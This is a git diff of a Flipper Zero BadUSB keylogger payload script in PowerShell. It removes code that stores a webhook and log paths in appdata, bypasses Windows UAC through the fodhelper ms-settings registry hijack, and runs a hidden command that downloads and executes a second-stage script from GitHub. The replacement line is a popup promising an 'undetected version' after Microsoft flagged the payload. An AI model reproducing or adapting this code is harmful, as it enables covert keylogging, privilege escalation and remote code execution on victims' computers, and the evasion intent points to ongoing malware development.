diff --git a/Payloads/Flip-Keylogger/keylogger.ps1 b/Payloads/Flip-Keylogger/keylogger.ps1 index 3fc34b2..9669f06 100644 --- a/Payloads/Flip-Keylogger/keylogger.ps1 +++ b/Payloads/Flip-Keylogger/keylogger.ps1 @@ -1,19 +1 @@ -if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"}; -echo $dc > "$env:appdata\-locker\wh.txt"; -echo $log > "$env:appdata\-locker\log.txt"; -echo $ks > "$env:appdata\-locker\killswitch.txt"; - -function s1 { - $user = "$env:COMPUTERNAME\$env:USERNAME" - $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user -if($isAdmin){ - $259="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; - reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; - - } - else{ - Break - } -} - -s1 +$done = New-Object -ComObject Wscript.Shell;$done.Popup("This payload has been detected by Microsoft. An updated undetected version will be released as soon as possible",10)